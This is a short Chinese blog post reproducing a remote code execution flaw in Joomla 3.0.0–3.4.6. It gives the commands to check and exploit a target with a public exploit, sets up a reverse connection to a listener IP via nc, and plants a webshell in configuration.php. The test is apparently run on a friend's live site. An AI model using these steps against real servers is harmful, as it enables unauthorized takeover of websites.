Joomla 3.0.0 --> 3.4.6-RCE复现

Joomla是一款网站管理系统CMS,最近曝出其3.00-3.4.6的joomla版本存在一个RCE漏洞。

并且大佬已将exp放在了github上,下载地址:https://www.exploit-db.com/exploits/47465

该exp是用python3写的

环境的话,可以自己在服务器或者本机上搭建一个joomla对应的版本,网上很多教程。

我这里直接使用一个朋友的站来做实验,我们先用这个python文件验证是否存在该漏洞:

python3 Joomla3.4.6-RCE-exp.py -t http://yourhost/

 

 

 

 像这样最后显示use --exploit to exploit it 就说明此站点存在这个rce漏洞

然后利用exp的命令:

python3 Joomla3.4.6-RCE-exp.py -t http://yourhost/ --exploit --lhost 192.168.1.120 --lport 9000 //用于监听的主机的ip和一个不占用的端口

Joomla 3.0.0 --> 3.4.6-RCE复现_第1张图片

 

 然后用本机通过nc来监听9000端口:

Joomla 3.0.0 --> 3.4.6-RCE复现_第2张图片

 

 之后再运行exp的命令,将自动写入一句话木马到根目录下面的configuration.php文件里面:

 出现如上图所示的字符串即是一句话木马的随机密码。

然后菜刀连接

Joomla 3.0.0 --> 3.4.6-RCE复现_第3张图片

 

 最后成功getshell。

 

你可能感兴趣的:(Joomla 3.0.0 --> 3.4.6-RCE复现)